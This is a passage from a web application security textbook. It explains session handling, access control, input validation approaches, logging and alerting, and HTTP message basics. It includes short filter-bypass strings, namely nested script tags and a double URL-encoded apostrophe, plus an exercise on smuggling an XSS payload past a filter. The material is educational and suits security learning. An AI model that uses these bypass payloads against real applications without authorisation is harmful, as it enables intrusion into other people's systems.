the user will access various pages and functions, making a series of HTTP

requests from their browser. At the same time, the application will be receiving

countless other requests from different users, some of whom are authenticated

and some of whom are anonymous. In order to enforce effective access control,

the application needs a way of identifying and processing the series of requests

that originate from each unique user.

Virtually all web applications meet this requirement by creating a session

for each user and issuing the user a token that identifies the session. The ses-

sion itself is a set of data structures held on the server, which are used to track

the state of the user’s interaction with the application. The token is a unique

string that the application maps to the session. When a user has received a

Chapter 2 ■ Core Defense Mechanisms 17

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 17

token, the browser automatically submits this back to the server in each sub-

sequent HTTP request, enabling the application to associate the request with

that user. HTTP cookies are the standard method for transmitting session

tokens, although many applications use hidden form fields or the URL query

string for this purpose. If a user does not make a request for a given period,

then the session is ideally expired, as in Figure 2-2.

In terms of attack surface, the session management mechanism is highly

dependent on the security of its tokens, and the majority of attacks against it

seek to compromise the tokens issued to other users. If this is possible, an

attacker can masquerade as the victim user and use the application just as if

they had actually authenticated as that user. The principal areas of vulnerabil-

ity arise from defects in the way tokens are generated, enabling an attacker to

guess the tokens issued to other users, and defects in the way tokens are sub-

sequently handled, enabling an attacker to capture other users’ tokens.

Figure 2-2: An application enforcing session timeout

A small number of applications dispense with the need for session tokens by

using other means of re-identifying users across multiple requests. If HTTP’s

built-in authentication mechanism is used, then the browser automatically

resubmits the user’s credentials with each request, enabling the application to

identify the user directly from these. In other cases, the application stores the

state information on the client side rather than the server, usually in encrypted

form to prevent tampering.

Access Control

The final logical step in the process of handling user access is to make and

enforce correct decisions regarding whether each individual request should be

permitted or denied. If the preceding mechanisms are functioning correctly,

the application knows the identity of the user from whom each request is

received. On this basis, it needs to decide whether that user is authorized to

perform the action, or access the data, that he is requesting (see Figure 2-3).

The access control mechanism usually needs to implement some fine-

grained logic, with different considerations being relevant to different areas of

18 Chapter 2 ■ Core Defense Mechanisms

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 18

the application and different types of functionality. An application might sup-

port numerous different user roles, each involving different combinations of

specific privileges. Individual users may be permitted to access a subset of the

total data held within the application. Specific functions may implement trans-

action limits and other checks, all of which need to be properly enforced based

on the user’s identity.

Figure 2-3: An application enforcing access control

Because of the complex nature of typical access control requirements, this

mechanism is a frequent source of security vulnerabilities that enable an

attacker to gain unauthorized access to data and functionality. Developers

very often make flawed assumptions about how users will interact with the

application, and frequently make oversights by omitting access control checks

from some application functions. Probing for these vulnerabilities is often

laborious because essentially the same checks need to be repeated for each

item of functionality. Because of the prevalence of access control flaws, how-

ever, this effort is always a worthwhile investment when you are attacking a

web application.

Handling User Input

Recall the fundamental security problem described in Chapter 1: all user input

is untrusted. A huge variety of different attacks against web applications

involve submitting unexpected input, crafted to cause behavior that was not

intended by the application’s designers. Correspondingly, a key requirement

for an application’s security defenses is that it must handle user input in a safe

manner.

Input-based vulnerabilities can arise anywhere within an application’s func-

tionality, and in relation to practically every type of technology in common use.

“Input validation” is often cited as the necessary defense against these attacks.

However, there is no single protective mechanism that can be employed every-

Chapter 2 ■ Core Defense Mechanisms 19

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 19

where, and defending against malicious input is often not as straightforward as

it sounds.

Varieties of Input

A typical web application processes user-supplied data in a range of different

forms. Some kinds of input validation may not be feasible or desirable for all

of these forms of input. Figure 2-4 shows the kind of input validation often

performed by a user registration function.

In many cases, an application may be able to impose very stringent valida-

tion checks on a specific item of input. For example, a username submitted to

a login function may be required to have a maximum length of eight charac-

ters and contain only alphabetical letters.

In other cases, the application must tolerate a wider range of possible input.

For example, an address field submitted to a personal details page might legit-

imately contain letters, numbers, spaces, hyphens, apostrophes, and other char-

acters. For this item, there are still restrictions that can feasibly be imposed,

however. The data should not exceed a reasonable length limit (such as 50 char-

acters), and should not contain any HTML mark-up.

In some situations, an application may need to accept completely arbitrary

input from users. For example, a user of a blogging application may create a

blog whose subject is web application hacking. Posts and comments made to

the blog may quite legitimately contain explicit attack strings that are being

discussed. The application may need to store this input within a database,

write it to disk, and display it back to users in a safe way. It cannot simply

reject the input because it looks potentially malicious without substantially

diminishing the value of the application to some of its user base.

Figure 2-4: An application performing input validation

In addition to the various kinds of input that is entered by users via the

browser interface, a typical application also receives numerous items of data

that began their life on the server and that are sent to the client so that the client

20 Chapter 2 ■ Core Defense Mechanisms

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 20

can transmit them back to the server on subsequent requests. This includes

items such as cookies and hidden form fields, which are not seen by ordinary

users of the application but which an attacker can of course view and modify.

In these cases, applications can often perform very specific validation of the

data received. For example, a parameter might be required to have one of a

specific set of known values, such as a cookie indicating the user’s preferred

language, or to be in a specific format, such as a customer ID number. Further,

when an application detects that server-generated data has been modified in a

way that is not possible for an ordinary user with a standard browser, this is

often an indication that the user is attempting to probe the application for vul-

nerabilities. In these cases, the application should reject the request and log the

incident for potential investigation (see the “Handling Attackers” section later

in this chapter).

Approaches to Input Handling

There are various broad approaches that are commonly taken to the problem

of handling user input. Different approaches are often preferable for different

situations and different types of input, and a combination of approaches may

sometimes be desirable.

“Reject Known Bad”

This approach typically employs a blacklist containing a set of literal strings or

patterns that are known to be used in attacks. The validation mechanism

blocks any data that matches the blacklist and allows everything else.

In general, this is regarded as the least effective approach to validating user

input, for two main reasons. First, a typical vulnerability in a web application

can be exploited using a wide variety of different input, which may be

encoded or represented in various different ways. Except in the simplest of

cases, it is likely that a blacklist will omit some patterns of input that can be

used to attack the application. Second, techniques for exploitation are con-

stantly evolving. Novel methods for exploiting existing categories of vulnera-

bility are unlikely to be blocked by current blacklists.

“Accept Known Good”

This approach employs a white list containing a set of literal strings or pat-

terns, or a set of criteria, that is known to match only benign input. The vali-

dation mechanism allows data that matches the white list, and blocks

everything else. For example, before looking up a requested product code in

the database, an application might validate that it contains only alphanumeric

Chapter 2 ■ Core Defense Mechanisms 21

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 21

characters and is exactly six characters long. Given the subsequent processing

that will be done on the product code, the developers know that input passing

this test cannot possibly cause any problems.

In cases where this approach is feasible, it is regarded as the most effective

way of handling potentially malicious input. Provided that due care is taken in

constructing the white list, an attacker will not be able to use crafted input to

interfere with the application’s behavior. However, there are numerous situa-

tions in which an application must accept data for processing that does not

meet any reasonable criteria for what is known to be “good.” For example,

some people’s names contain the apostrophe and hyphen characters. These

can be used in attacks against databases, but it may be a requirement that the

application should permit anyone to register under their real name. Hence,

while it is often extremely effective, the white-list-based approach does not

represent an all-purpose solution to the problem of handling user input.

Sanitization

This approach recognizes the need to sometimes accept data that cannot be

guaranteed as safe. Instead of rejecting this input, the application sanitizes it in

various ways to prevent it from having any adverse effects. Potentially mali-

cious characters may be removed from the data altogether, leaving only what

is known to be safe, or they may be suitably encoded or “escaped” before fur-

ther processing is performed.

Approaches based on data sanitization are often highly effective, and in

many situations they can be relied upon as a general solution to the problem of

malicious input. For example, the usual defense against cross-site scripting

attacks is to HTML-encode dangerous characters before these are embedded

into pages of the application (see Chapter 12). However, effective sanitization

may be difficult to achieve if several kinds of potentially malicious data need

to be accommodated within one item of input. In this situation, a boundary

validation approach is desirable, as described later.

Safe Data Handling

Very many web application vulnerabilities arise because user-supplied data is

processed in unsafe ways. It is often the case that vulnerabilities can be

avoided, not by validating the input itself but by ensuring that the processing

that is performed on it is inherently safe. In some situations, there are safe pro-

gramming methods available that avoid common problems. For example, SQL

injection attacks can be prevented through the correct use of parameterized

queries for database access (see Chapter 9). In other situations, application

functionality can be designed in such a way that inherently unsafe practices,

22 Chapter 2 ■ Core Defense Mechanisms

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 22

such as passing user input to an operating system command interpreter, are

avoided altogether.

This approach cannot be applied to every kind of task that web applications

need to perform, but where it is available it is an effective general approach to

handling potentially malicious input.

Semantic Checks

The defenses described so far all address the need to defend the application

against various kinds of malformed data whose content has been crafted to

interfere with the application’s processing. However, with some vulnerabili-

ties the input supplied by the attacker is identical to the input that an ordinary,

non-malicious user may submit. What makes it malicious is the different cir-

cumstances in which it is submitted. For example, an attacker might seek to

gain access to another user’s bank account by changing an account number

transmitted in a hidden form field. No amount of syntactic validation will dis-

tinguish between the user’s data and the attacker’s. To prevent unauthorized

access, the application needs to validate that the account number submitted

belongs to the user who has submitted it.

Boundary Validation

The idea of validating data across trust boundaries is a familiar one. The core

security problem with web applications arises because data received from

users is untrusted. While input validation checks implemented on the client

side may improve performance and the user’s experience, they do not provide

any assurance over the data that actually reaches the server. The point at

which user data is first received by the server-side application represents a

huge trust boundary, at which the application needs to take measures to

defend itself against malicious input.

Given the nature of the core problem, it is tempting to think of the input val-

idation problem in terms of a frontier between the Internet, which is “bad” and

untrusted, and the server-side application, which is “good” and trusted. In

this picture, the role of input validation is to clean potentially malicious data

on arrival and then pass the clean data to the trusted application. From this

point onwards, the data may be trusted and processed without any further

checks or concern about possible attacks.

As will become evident when we begin to examine some actual vulnerabil-

ities, this simple picture of input validation is inadequate, for several reasons:

■■

Given the wide range of functionality that applications implement, and

the different technologies in use, a typical application needs to defend

itself against a huge variety of input-based attacks, each of which may

Chapter 2 ■ Core Defense Mechanisms 23

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 23

employ a diverse set of crafted data. It would be very difficult to devise

a single mechanism at the external boundary to defend against all of

these attacks.

■■

Many application functions involve chaining together a series of

different types of processing. A single piece of user-supplied input

might result in a number of operations in different components, with

the output of each being used as the input for the next. As the data is

transformed, it might come to bear no resemblance to the original

input, and a skilled attacker may be able to manipulate the application

to cause malicious input to be generated at a key stage of the process-

ing, attacking the component which receives this data. It would be

extremely difficult to implement a validation mechanism at the external

boundary to foresee all of the possible results of processing each piece

of user input.

■■

Defending against different categories of input-based attack may entail

performing different validation checks on user input that are incompat-

ible with one another. For example, preventing cross-site scripting

attacks may require HTML-encoding the

> character as > while pre-

venting command injection attacks may require blocking input contain-

ing the

& and ; characters. Attempting to prevent all categories of attack

simultaneously at the application’s external boundary may sometimes

be impossible.

A more effective model uses the concept of boundary validation. Here, each

individual component or functional unit of the server-side application treats

its inputs as coming from a potentially malicious source. Data validation is

performed at each of these trust boundaries, in addition to the external frontier

between the client and server. This model provides a solution to the problems

described in the previous list. Each component can defend itself against the

specific types of crafted input to which it may be vulnerable. As data passes

through different components, validation checks can be performed against

whatever value the data has as a result of previous transformations. And

because the various validation checks are implemented at different stages of

processing, they are unlikely to come into conflict with one another.

Figure 2-5 illustrates a typical situation where boundary validation is the

most effective approach to defending against malicious input. The user login

results in several steps of processing being performed on user-supplied input,

and suitable validation is performed at each step:

1. The application receives the user’s login details. The form handler vali-

dates that each item of input contains only permitted characters, is

within a specific length limit, and does not contain any known attack

signatures.

24 Chapter 2 ■ Core Defense Mechanisms

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 24

2. The application performs an SQL query to verify the user’s credentials.

To prevent SQL injection attacks, any characters within the user input

that may be used to attack the database are escaped before the query is

constructed.

3. If the login succeeds, the application passes certain data from the user’s

profile to a SOAP service to retrieve further information about her

account. To prevent SOAP injection attacks, any XML metacharacters

within the user’s profile data are suitably encoded.

4. The application displays the user’s account information back to the

user’s browser. To prevent cross-site scripting attacks, the application

HTML-encodes any user-supplied data that is embedded into the

returned page.

Figure 2-5: An application function using boundary validation at multiple stages of

processing

The specific vulnerabilities and defenses involved in the described scenario

will be examined in detail in later chapters. If variations on this functionality

involved passing data to further application components, then similar

defenses would need to be implemented at the relevant trust boundaries. For

example, if a failed login caused the application to send a warning email to the

user, then any user data incorporated into the email may need to be checked

for SMTP injection attacks.

1. General checks

2. Clean SQL

SQL query

Database

Display account

details

3. Encode XML

metacharacters

4. Sanitize output

Application

server

SOAP

message

SOAP service

User

Chapter 2 ■ Core Defense Mechanisms 25

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 25

Multistep Validation and Canonicalization

A common problem encountered by input-handling mechanisms arises when

user-supplied input is manipulated across several steps as part of the valida-

tion logic. If this process is not handled carefully, then an attacker may be able

to construct crafted input that succeeds in smuggling malicious data through

the validation mechanism. One version of this problem occurs when an appli-

cation attempts to sanitize user input by removing or encoding certain charac-

ters or expressions. For example, an application may attempt to defend against

some cross-site scripting attacks by stripping the expression

from any user-supplied data. However, an attacker may be able to bypass the

filter by supplying the following input:

<scr<script>ipt>

When the blocked expression is removed, the surrounding data contracts to

restore the malicious payload, because the filter is not being applied recursively.

Similarly, if more than one validation step is performed on user input, an

attacker may be able to exploit the ordering of these steps to bypass the filter.

For example, if the application first removes script tags recursively and then

strips any quotation marks, the following input can be used to defeat the vali-

dation:

<scr”ipt>

A different problem arises in relation to data canonicalization. When input

is sent from the user’s browser, it may be encoded in various ways. These

encoding schemes exist in order that unusual characters and binary data may

be transmitted safely over HTTP (see Chapter 3 for more details). Canonical-

ization is the process of converting or decoding data into a common character

set. If any canonicalization is carried out after input filters have been applied,

then an attacker may be able to use encoding to bypass the validation mecha-

nism. For example, an application may attempt to defend against some SQL

injection attacks by removing the apostrophe character from user input. How-

ever, if the sanitized data is subsequently canonicalized, then an attacker may

be able to use the URL-encoded form

%27

to defeat the validation. If the application strips this URL-encoded form, but also

performs further canonicalization, then the following bypass may be effective:

%%2727

26 Chapter 2 ■ Core Defense Mechanisms

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 26

Throughout this book, we will describe numerous attacks of this kind which

are effective in defeating many applications’ defenses against common input-

based vulnerabilities.

Avoiding problems with multistep validation and canonicalization can

sometimes be difficult, and there is no single solution to the problem. One

approach is to perform sanitization steps recursively, continuing until no fur-

ther modifications have been made on an item of input. However, where the

desired sanitization involves escaping a problematic character, this may result

in an infinite loop. Often, the problem can only be addressed on a case-by-case

basis, based upon the types of validation being performed. Where feasible, it

may be preferable to avoid attempting to clean some kinds of bad input, and

simply reject it altogether.

Handling Attackers

Anyone designing an application for which security is remotely important

must work on the assumption that it will be directly targeted by dedicated and

skilled attackers. A key function of the application’s security mechanisms is to

be able to handle and react to these attacks in a controlled way. These mecha-

nisms often incorporate a mix of defensive and offensive measures designed to

frustrate an attacker as much as possible, and provide appropriate notification

and evidence to the application’s owners of what has taken place. Measures

implemented to handle attackers typically include the following tasks:

■■

Handling errors

■■

Maintaining audit logs

■■

Alerting administrators

■■

Reacting to attacks

Handling Errors

However careful an application’s developers are in validating user input, it is

virtually inevitable that some unanticipated errors will occur. Errors resulting

from the actions of ordinary users are likely to be identified during functional-

ity and user acceptance testing, and so will be taken account of before the

application is deployed in a production context. However, it is very difficult to

anticipate every possible way in which a malicious user may interact with the

application, and so further errors should be expected when the application

comes under attack.

Chapter 2 ■ Core Defense Mechanisms 27

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 27

A key defense mechanism is for the application to handle unexpected

errors in a graceful manner, and either recover from them or present a suit-

able error message to the user. In a production context, the application

should never return any system-generated messages or other debug infor-

mation in its responses. As you will see throughout this book, overly verbose

error messages can greatly assist malicious users in furthering their attacks

against the application. In some situations, an attacker can leverage defective

error handling to retrieve sensitive information within the error messages

themselves, providing a valuable channel for stealing data from the applica-

tion. Figure 2-6 shows an example of an unhandled error resulting in a ver-

bose error message.

Figure 2-6: An unhandled error

Most web development languages provide good error-handling support

through try-catch blocks and checked exceptions. Application code should

make extensive use of these constructs to catch specific and general errors and

handle them appropriately. Further, most application servers can be configured

to deal with unhandled application errors in customized ways, for example by

28 Chapter 2 ■ Core Defense Mechanisms

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 28

presenting an uninformative error message. See Chapter 14 for more details of

these measures.

Effective error handling is often integrated with the application’s logging

mechanisms, which record as much debug information as possible about

unanticipated errors. Very often, unexpected errors point to defects within the

application’s defenses that can be addressed at the source if the application’s

owner has the required information.

Maintaining Audit Logs

Audit logs are primarily of value when investigating intrusion attempts against

an application. Following such an incident, effective audit logs should enable

the application’s owners to understand exactly what has taken place, which

vulnerabilities (if any) were exploited, whether the attacker gained unautho-

rized access to data or performed any unauthorized actions, and as far as pos-

sible, provide evidence as to the intruder’s identity.

In any application for which security is important, key events should be

logged as a matter of course. At a minimum, these typically include:

■■

All events relating to the authentication functionality, such as successful

and failed login, and change of password.

■■

Key transactions, such as credit card payments and funds transfers.

■■

Access attempts that are blocked by the access control mechanisms.

■■

Any requests containing known attack strings that indicate overtly

malicious intentions.

In many security-critical applications, such as those used by online banks,

every single client request is logged in full, providing a complete forensic

record that can be used to investigate any incidents.

Effective audit logs typically record the time of each event, the IP address

from which the request was received, the session token, and the user’s account

(if authenticated). Such logs need to be strongly protected against unautho-

rized read or write access. An effective approach is to store audit logs on an

autonomous system that accepts only update messages from the main appli-

cation. In some situations, logs may be flushed to write-once media to ensure

their integrity in the event of a successful attack.

In terms of attack surface, poorly protected audit logs can provide a gold

mine of information to an attacker, disclosing a host of sensitive information

such as session tokens and request parameters that may enable them to imme-

diately compromise the entire application (see Figure 2-7).

Chapter 2 ■ Core Defense Mechanisms 29

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 29

Figure 2-7: Poorly protected application logs containing sensitive

information submitted by other users

Alerting Administrators

Audit logs enable an application’s owners to retrospectively investigate intru-

sion attempts, and if possible, take legal action against the perpetrator. How-

ever, in many situations it is desirable to take much more immediate action, in

real time, in response to attempted attacks. For example, administrators may

block the IP address or user account being used by an attacker. In extreme

cases, they may even take the application offline while the attack is investi-

gated and remedial action taken. Even if a successful intrusion has already

occurred, its practical effects may be mitigated if defensive action is taken at an

early stage.

In most situations, alerting mechanisms must balance the conflicting objec-

tives of reporting each genuine attack reliably and of not generating so many

alerts that these come to be ignored. A well-designed alerting mechanism can

use a combination of factors to diagnose that a determined attack is underway,

and can aggregate related events into a single alert where possible. Anomalous

events monitored by alerting mechanisms often include:

■■

Usage anomalies, such as large numbers of requests being received

from a single IP address or user, indicating a scripted attack.

■■

Business anomalies, such as an unusual number of funds transfers

being made to or from a single bank account.

■■

Requests containing known attack strings.

■■

Requests where data that is hidden from ordinary users has been

modified.

30 Chapter 2 ■ Core Defense Mechanisms

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 30

Some of these functions can be provided reasonably well by off-the-shelf

application firewalls and intrusion detection products. These typically use a

mixture of signature- and anomaly-based rules to identify malicious use of the

application, and may reactively block malicious requests as well as issue alerts

to administrators. These products can form a valuable layer of defense pro-

tecting a web application, particularly in the case of existing applications

known to contain problems but where resources to fix these are not immedi-

ately available. However, their effectiveness is normally limited by the fact

that each web application is different, and so the rules employed are inevitably

generic to some extent. Web application firewalls are normally good at identi-

fying the most obvious attacks, where an attacker submits standard attack

strings in each request parameter. However, many attacks are more subtle than

this, for example modifying the account number in a hidden field to access

another user’s data, or submitting requests out of sequence to exploit defects

in the application’s logic. In these cases, a request submitted by an attacker

may be identical to that submitted by a benign user — what makes it mali-

cious are the circumstances in which it is made.

In any security-critical application, the most effective way to implement

real-time alerting is to integrate this tightly with the application’s input vali-

dation mechanisms and other controls. For example, if a cookie is expected to

have one of a specific set of values, then any violation of this indicates that its

value has been modified in way that is not possible for ordinary users of the

application. Similarly, if a user changes an account number in a hidden field to

identify a different user’s account, this strongly indicates malicious intent. The

application should already be checking for these attacks as part of its primary

defenses, and these protective mechanisms can easily hook into the applica-

tion’s alerting mechanism to provide fully customized indicators of malicious

activity. Because these checks have been tailored to the application’s actual

logic, with a fine-grained knowledge of how ordinary users should be behav-

ing, they are much less prone to false positives than any off-the-shelf solution,

however configurable or able to learn that solution may be.

Reacting to Attacks

In addition to alerting administrators, many security-critical applications con-

tain built-in mechanisms to react defensively to users who are identified as

potentially malicious.

Because each application is different, most real-world attacks require an

attacker to probe systematically for vulnerabilities, submitting numerous

requests containing crafted input designed to indicate the presence of various

common vulnerabilities. Effective input validation mechanisms will identify

many of these requests as potentially malicious, and block the input from

Chapter 2 ■ Core Defense Mechanisms 31

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 31

having any undesirable effect on the application. However, it is sensible to

assume that some bypasses to these filters exist, and that the application does

contain some actual vulnerabilities waiting to be discovered and exploited. At

some point, an attacker working systematically is likely to discover these

defects.

For this reason, some applications take automatic reactive measures to frus-

trate the activities of an attacker who is working in this way, for example by

responding increasingly slowly to the attacker’s requests or by terminating the

attacker’s session, requiring him to log in or perform other steps before con-

tinuing the attack. While these measures will not defeat the most patient and

determined attacker, they will deter many more casual attackers, and will buy

additional time for administrators to monitor the situation and take more

drastic action if desired.

Reacting to apparent attackers is not, of course, a substitute for fixing any

vulnerabilities that exist within the application. However, in the real world,

even the most diligent efforts to purge an application of security flaws may

leave some exploitable defects remaining. Placing further obstacles in the way

of an attacker is an effective defense-in-depth measure that reduces the likeli-

hood that any residual vulnerabilities will be found and exploited.

Managing the Application

Any useful application needs to be managed and administered, and this facil-

ity often forms a key part of the application’s security mechanisms, providing

a way for administrators to manage user accounts and roles, access monitoring

and audit functions, perform diagnostic tasks, and configure aspects of the

application’s functionality.

In many applications, administrative functions are implemented within the

application itself, accessible through the same web interface as its core nonse-

curity functionality, as shown in Figure 2-8. Where this is the case, the admin-

istrative mechanism represents a critical part of the application’s attack

surface. Its primary attraction for an attacker is as a vehicle for privilege esca-

lation, for example:

■■

Weaknesses in the authentication mechanism may enable an attacker

to gain administrative access, effectively compromising the entire

application.

■■

Many applications do not implement effective access control of some of

their administrative functions. An attacker may find a means of creat-

ing a new user account with powerful privileges.

32 Chapter 2 ■ Core Defense Mechanisms

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 32

■■

Administrative functionality often involves displaying data that origi-

nated from ordinary users. Any cross-site scripting flaws within the

administrative interface can lead to compromise of a user session that is

guaranteed to have powerful privileges.

■■

Administrative functionality is often subjected to less rigorous security

testing, because its users are deemed to be trusted, or because penetra-

tion testers are given access to only low-privileged accounts. Further, it

often has a need to perform inherently dangerous operations, involving

access to files on disk or operating system commands. If an attacker can

compromise the administrative function, they can often leverage it to

take control of the entire server.

Figure 2-8: An administrative interface within a web application.

Chapter Summary

Despite their extensive differences, virtually all web applications employ the

same core security mechanisms in some shape or form. These mechanisms

represent an application’s primary defenses against malicious users, and

therefore also comprise the bulk of the application’s attack surface. The vul-

nerabilities we shall examine later in this book mainly arise from defects

within these core mechanisms.

Of these components, the mechanisms for handling user access and user

input are the most important and should take up most of your attention when

Chapter 2 ■ Core Defense Mechanisms 33

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 33

you are targeting an application. Defects in these mechanisms often lead to

complete compromise of the application, enabling you to access data belong-

ing to other users, perform unauthorized actions, and inject arbitrary code and

commands.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. Why are an application’s mechanisms for handling user access only as

strong as the weakest of these components?

2. What is the difference between a session and a session token?

3. Why is it not always possible to use a whitelist-based approach to input

validation?

4. You are attacking an application that implements an administrative

function. You do not have any valid credentials to use the function.

Why should you nevertheless pay very close attention to it?

5. An input validation mechanism designed to block cross-site scripting

attacks performs the following sequence of steps on an item of input:

1. Strip any

2. Truncate the input to 50 characters.

3. Remove any quotation marks within the input.

4. URL-decode the input.

5. If any items were deleted, return to step 1.

Can you bypass this validation mechanism to smuggle the following

data past it?

“><script>alert(“foo”)</script>

34 Chapter 2 ■ Core Defense Mechanisms

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 34

Web applications employ a myriad of different technologies to implement

their functionality. This chapter contains a short primer on the key technolo-

gies that you are likely to encounter when attacking web applications. We shall

examine the HTTP protocol, the technologies commonly employed on the

server and client sides, and the encoding schemes used to represent data in

different situations. These technologies are in general easy to understand, and

a grasp of their relevant features is key to performing effective attacks against

web applications.

If you are already familiar with the key technologies used in web applications,

you can quickly skim through this chapter to confirm that there is nothing new

in here for you. If you are still learning how web applications work, you should

read this primer before continuing to the later chapters on specific vulnerabili-

ties. For further reading on any of the areas covered, we recommended HTTP:

The Definitive Guide by David Gourley and Brian Totty (O’Reilly, 2002).

The HTTP Protocol

The hypertext transfer protocol (HTTP) is the core communications protocol

used to access the World Wide Web and is used by all of today’s web applica-

tions. It is a simple protocol that was originally developed for retrieving static

text-based resources, and has since been extended and leveraged in various

Web Application Technologies

CHAPTER

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 35

ways to enable it to support the complex distributed applications that are now

commonplace.

HTTP uses a message-based model in which a client sends a request mes-

sage, and the server returns a response message. The protocol is essentially

connectionless: although HTTP uses the stateful TCP protocol as its transport

mechanism, each exchange of request and response is an autonomous transac-

tion, and may use a different TCP connection.

HTTP Requests

All HTTP messages (requests and responses) consist of one or more headers,

each on a separate line, followed by a mandatory blank line, followed by an

optional message body. A typical HTTP request is as follows:

GET /books/search.asp?q=wahh HTTP/1.1

Accept: image/gif, image/xxbitmap, image/jpeg, image/pjpeg,

application/xshockwaveflash, application/vnd.msexcel,

application/vnd.mspowerpoint, application/msword, */*

Referer: http://wahh-app.com/books/default.asp

Accept-Language: en-gb,en-us;q=0.5

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: wahh-app.com

Cookie: lang=en; JSESSIONID=0000tI8rk7joMx44S2Uu85nSWc_:vsnlc502

The first line of every HTTP request consists of three items, separated by

spaces:

■■

A verb indicating the HTTP method. The most commonly used method

GET, whose function is to retrieve a resource from the web server. GET

requests do not have a message body, so there is no further data follow-

ing the blank line after the message headers.

■■

The requested URL. The URL functions as a name for the resource

being requested, together with an optional query string containing

parameters that the client is passing to that resource. The query string is

indicated by the

? character in the URL, and in the example there is a

single parameter with the name

q and the value wahh.

■■

The HTTP version being used. The only HTTP versions in common use

on the Internet are 1.0 and 1.1, and most browsers use version 1.1 by

default. There are a few differences between the specifications of these

two versions; however, the only difference you are likely to encounter

when attacking web applications is that in version 1.1 the

Host request

header is mandatory.

36 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 36

Some other points of interest in the example request are:

■■

The Referer header is used to indicate the URL from which the request

originated (for example, because the user clicked a link on that page).

Note that this header was misspelled in the original HTTP specification,

and the misspelled version has been retained ever since.

■■

The User-Agent header is used to provide information about the

browser or other client software that generated the request. Note that

the Mozilla prefix is included by most browsers for historical reasons —

this was the

User-Agent string used by the originally dominant Net -

scape browser, and other browsers wished to assert to web sites that

they were compatible with this standard. As with many quirks from

computing history, it has become so established that it is still retained,

even on the current version of Internet Explorer, which made the

request shown in the example.

■■

The Host header is used to specify the hostname that appeared in the

full URL being accessed. This is necessary when multiple web sites are

hosted on the same server, because the URL sent in the first line of the

request does not normally contain a hostname. (See Chapter 16 for

more information about virtually hosted web sites.)

■■

The Cookie header is used to submit additional parameters that the

server has issued to the client (described in more detail later in this

chapter).

HTTP Responses

A typical HTTP response is as follows:

HTTP/1.1 200 OK

Date: Sat, 19 May 2007 13:49:37 GMT

Server: IBM_HTTP_SERVER/1.3.26.2 Apache/1.3.26 (Unix)

Set-Cookie: tracking=tI8rk7joMx44S2Uu85nSWc

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Content-Type: text/html;charset=ISO-8859-1

Content-Language: en-US

Content-Length: 24246

<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<head>

charset=iso-8859-1”>

...

Chapter 3 ■ Web Application Technologies 37

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 37

The first line of every HTTP response consists of three items, separated by

spaces:

■■

The HTTP version being used.

■■

A numeric status code indicating the result of the request. 200 is the

most common status code; it means that the request was successful and

the requested resource is being returned.

■■

A textual “reason phrase” further describing the status of the response.

This can have any value and is not used for any purpose by current

browsers.

Some other points of interest in the previous response are:

■■

The Server header contains a banner indicating the web server soft-

ware being used, and sometimes other details such as installed modules

and the server operating system. The information contained may or

may not be accurate.

■■

The Set-Cookie header is issuing the browser a further cookie; this will

be submitted back in the

Cookie header of subsequent requests to this

server.

■■

The Pragma header is instructing the browser not to store the response

in its cache, and the

Expires header also indicates that the response

content expired in the past and so should not be cached. These instruc-

tions are frequently issued when dynamic content is being returned, to

ensure that browsers obtain a fresh version of this content on subse-

quent occasions.

■■

Almost all HTTP responses contain a message body following the blank

line after the headers, and the

Content-Type header indicates that the

body of this message contains an HTML document.

■■

The Content-Length header indicates the length of the message body in

bytes.

HTTP Methods

When you are attacking web applications, you will be dealing almost exclu-

sively with the most commonly used methods:

GET and POST. There are some

important differences between these methods which you need to be aware of,

and which can affect an application’s security if overlooked.

The

GET method is designed for retrieval of resources. It can be used to send

parameters to the requested resource in the URL query string. This enables users

to bookmark a URL for a dynamic resource that can be reused by themselves or

38 Chapter 3 ■ Web Application Technologies

70779c03.qxd:WileyRed 9/14/07 3:12 PM Page 38

other users to retrieve the equivalent resource on a subsequent occasion (as in a

bookmarked search query). URLs are displayed on-screen, and are logged in

various places, such as the browser history and the web server’s access logs.

They are also transmitted in the

Referer header to other sites when external

links are followed. For these reasons, the query string should not be used to

transmit any sensitive information.

The

POST method is designed for performing actions. With this method,

request parameters can be sent both in the URL query string and in the body

of the message. Although the URL can still be bookmarked, any parameters

sent in the message body will be excluded from the bookmark. These parame-

ters will also be excluded from the various locations in which logs of URLs are

maintained and from the

Referer header. Because the POST method is

designed for performing actions, if a user clicks the Back button of the browser

to return to a page that was accessed using this method, the browser will not

automatically reissue the request but will warn the user of what it is about to

do, as shown in Figure 3-1. This prevents users from unwittingly performing

an action more than once. For this reason,

POST requests should always be used

when an action is being performed.

Figure 3-1: Browsers do not automatically reissue POST requests made by users,

because these might result in an action being performed more than once

In addition to the GET and POST methods, the HTTP protocol supports

numerous other methods that have been created for specific purposes. The

other methods you are most likely to require knowledge of are:

■■

HEAD — This functions in the same way as a GET request except that

the server should not return a message body in its response. The server

should return the same headers that it would have returned to the cor-

responding

GET request. Hence, this method can be used for checking

whether a resource is present before making a

GET request for it.

■■

TRACE — This method is designed for diagnostic purposes. The server

should return in the response body the exact contents of the request

